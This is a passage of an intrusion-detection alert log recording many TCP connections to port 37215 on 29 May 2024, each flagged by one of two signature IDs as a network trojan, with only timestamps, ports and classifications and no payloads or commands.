                Timestamp:05/29/24-15:15:27.779708
                SID:2835222
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821433
                SID:2829579
                Source Port:46544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444268
                SID:2829579
                Source Port:57204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562197
                SID:2835222
                Source Port:35182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462509
                SID:2829579
                Source Port:34248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973216
                SID:2835222
                Source Port:43946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233658
                SID:2835222
                Source Port:48632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041159
                SID:2835222
                Source Port:41690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919570
                SID:2829579
                Source Port:58442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799353
                SID:2829579
                Source Port:44218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919797
                SID:2829579
                Source Port:52436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227161
                SID:2829579
                Source Port:36886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899260
                SID:2829579
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179559
                SID:2829579
                Source Port:43664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265514
                SID:2829579
                Source Port:37730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571178
                SID:2835222
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855510
                SID:2829579
                Source Port:47066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944151
                SID:2835222
                Source Port:41814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666759
                SID:2829579
                Source Port:52174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947314
                SID:2835222
                Source Port:60912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872954
                SID:2829579
                Source Port:60522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900664
                SID:2829579
                Source Port:34018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852651
                SID:2835222
                Source Port:37766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066415
                SID:2835222
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014802
                SID:2835222
                Source Port:47852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160424
                SID:2835222
                Source Port:35352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215297
                SID:2829579
                Source Port:45210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437392
                SID:2829579
                Source Port:54802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416613
                SID:2835222
                Source Port:35502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915641
                SID:2835222
                Source Port:42434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562852
                SID:2835222
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665899
                SID:2835222
                Source Port:48772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854861
                SID:2835222
                Source Port:43494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035507
                SID:2829579
                Source Port:45116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207670
                SID:2829579
                Source Port:42410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437640
                SID:2835222
                Source Port:47512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032748
                SID:2835222
                Source Port:39986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461301
                SID:2835222
                Source Port:42784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.099356
                SID:2835222
                Source Port:33912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743537
                SID:2835222
                Source Port:37348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982193
                SID:2829579
                Source Port:57348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845295
                SID:2835222
                Source Port:53560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663530
                SID:2829579
                Source Port:57216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364828
                SID:2835222
                Source Port:59398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763643
                SID:2835222
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010334
                SID:2835222
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990433
                SID:2835222
                Source Port:48138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166959
                SID:2835222
                Source Port:59650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001757
                SID:2835222
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231966
                SID:2835222
                Source Port:36572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977907
                SID:2829579
                Source Port:52832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232406
                SID:2835222
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801209
                SID:2829579
                Source Port:33692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321955
                SID:2835222
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736353
                SID:2835222
                Source Port:50330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583708
                SID:2835222
                Source Port:47510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779653
                SID:2829579
                Source Port:59294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972162
                SID:2829579
                Source Port:50280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929957
                SID:2829579
                Source Port:45678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731249
                SID:2835222
                Source Port:56452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913720
                SID:2835222
                Source Port:52484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543961
                SID:2835222
                Source Port:50516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766871
                SID:2835222
                Source Port:37918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528391
                SID:2835222
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687944
                SID:2835222
                Source Port:44878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839034
                SID:2835222
                Source Port:35216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797873
                SID:2835222
                Source Port:49074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932146
                SID:2835222
                Source Port:45218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320011
                SID:2835222
                Source Port:52532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026403
                SID:2829579
                Source Port:60252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164892
                SID:2835222
                Source Port:51334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665656
                SID:2829579
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422135
                SID:2835222
                Source Port:48322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563233
                SID:2835222
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510136
                SID:2829579
                Source Port:59642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421385
                SID:2829579
                Source Port:58028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443115
                SID:2835222
                Source Port:57596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010656
                SID:2829579
                Source Port:56274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211998
                SID:2835222
                Source Port:56858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896457
                SID:2829579
                Source Port:55666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994367
                SID:2835222
                Source Port:38112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141116
                SID:2835222
                Source Port:37304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217877
                SID:2829579
                Source Port:55222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233296
                SID:2835222
                Source Port:60932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440548
                SID:2835222
                Source Port:60592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854227
                SID:2835222
                Source Port:49828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989147
                SID:2829579
                Source Port:52952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233206
                SID:2829579
                Source Port:41642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.580061
                SID:2829579
                Source Port:49228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535825
                SID:2829579
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868231
                SID:2829579
                Source Port:38390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786815
                SID:2829579
                Source Port:51624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448974
                SID:2829579
                Source Port:56298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239974
                SID:2835222
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141203
                SID:2835222
                Source Port:36492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845415
                SID:2835222
                Source Port:51904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155184
                SID:2835222
                Source Port:55714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071202
                SID:2835222
                Source Port:42662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173406
                SID:2835222
                Source Port:54056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763044
                SID:2835222
                Source Port:60536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615309
                SID:2835222
                Source Port:60610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437614
                SID:2835222
                Source Port:40420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110837
                SID:2835222
                Source Port:52908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222832
                SID:2835222
                Source Port:58634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023380
                SID:2829579
                Source Port:56580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803082
                SID:2835222
                Source Port:42726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899229
                SID:2835222
                Source Port:38752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215605
                SID:2829579
                Source Port:38556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914251
                SID:2829579
                Source Port:41620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643975
                SID:2835222
                Source Port:44924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420065
                SID:2829579
                Source Port:53882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072687
                SID:2829579
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900312
                SID:2835222
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942850
                SID:2829579
                Source Port:60820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926685
                SID:2835222
                Source Port:60122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842122
                SID:2835222
                Source Port:42284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985420
                SID:2835222
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858437
                SID:2835222
                Source Port:60640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022514
                SID:2829579
                Source Port:46374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940520
                SID:2829579
                Source Port:43946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785442
                SID:2829579
                Source Port:42794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437047
                SID:2835222
                Source Port:35976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732172
                SID:2835222
                Source Port:34498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804924
                SID:2829579
                Source Port:40190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610970
                SID:2829579
                Source Port:38012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.045004
                SID:2835222
                Source Port:57752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963116
                SID:2829579
                Source Port:49986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873418
                SID:2835222
                Source Port:42572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374500
                SID:2829579
                Source Port:38422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417846
                SID:2829579
                Source Port:56366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722161
                SID:2835222
                Source Port:44378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781871
                SID:2829579
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982148
                SID:2829579
                Source Port:38460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669497
                SID:2835222
                Source Port:52166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902865
                SID:2829579
                Source Port:45524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.024823
                SID:2829579
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557790
                SID:2835222
                Source Port:43054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984902
                SID:2829579
                Source Port:45274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087361
                SID:2829579
                Source Port:48222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873173
                SID:2835222
                Source Port:57138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140412
                SID:2829579
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428340
                SID:2829579
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227651
                SID:2829579
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791675
                SID:2829579
                Source Port:59638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552036
                SID:2835222
                Source Port:56088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271132
                SID:2835222
                Source Port:45202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968677
                SID:2829579
                Source Port:56526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900258
                SID:2835222
                Source Port:36252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643363
                SID:2835222
                Source Port:44158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857274
                SID:2835222
                Source Port:43918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324940
                SID:2835222
                Source Port:41832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583865
                SID:2835222
                Source Port:36748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320155
                SID:2829579
                Source Port:47312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536696
                SID:2835222
                Source Port:44912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166511
                SID:2829579
                Source Port:41338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899535
                SID:2829579
                Source Port:46318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817086
                SID:2835222
                Source Port:48464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689003
                SID:2835222
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659561
                SID:2835222
                Source Port:46634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374517
                SID:2829579
                Source Port:44770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800866
                SID:2829579
                Source Port:41696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685060
                SID:2835222
                Source Port:49740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176743
                SID:2829579
                Source Port:60588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521015
                SID:2835222
                Source Port:51740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964084
                SID:2835222
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262096
                SID:2829579
                Source Port:42154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738297
                SID:2835222
                Source Port:46012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943576
                SID:2835222
                Source Port:41588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659843
                SID:2829579
                Source Port:58060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910959
                SID:2835222
                Source Port:47814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683678
                SID:2835222
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175010
                SID:2835222
                Source Port:43546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442596
                SID:2835222
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719609
                SID:2835222
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232118
                SID:2835222
                Source Port:57156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169189
                SID:2835222
                Source Port:45732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385476
                SID:2829579
                Source Port:47460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517451
                SID:2835222
                Source Port:44946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656073
                SID:2829579
                Source Port:50182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791752
                SID:2829579
                Source Port:47312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337309
                SID:2829579
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.888975
                SID:2829579
                Source Port:39580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184464
                SID:2829579
                Source Port:47330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716169
                SID:2835222
                Source Port:34276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740395
                SID:2829579
                Source Port:50168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853229
                SID:2835222
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794091
                SID:2835222
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816778
                SID:2829579
                Source Port:58366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886253
                SID:2835222
                Source Port:35126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075166
                SID:2835222
                Source Port:44076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175043
                SID:2835222
                Source Port:56458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957958
                SID:2835222
                Source Port:44788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675378
                SID:2835222
                Source Port:40878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953219
                SID:2835222
                Source Port:45700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988827
                SID:2829579
                Source Port:36778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763677
                SID:2835222
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419586
                SID:2835222
                Source Port:37974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675412
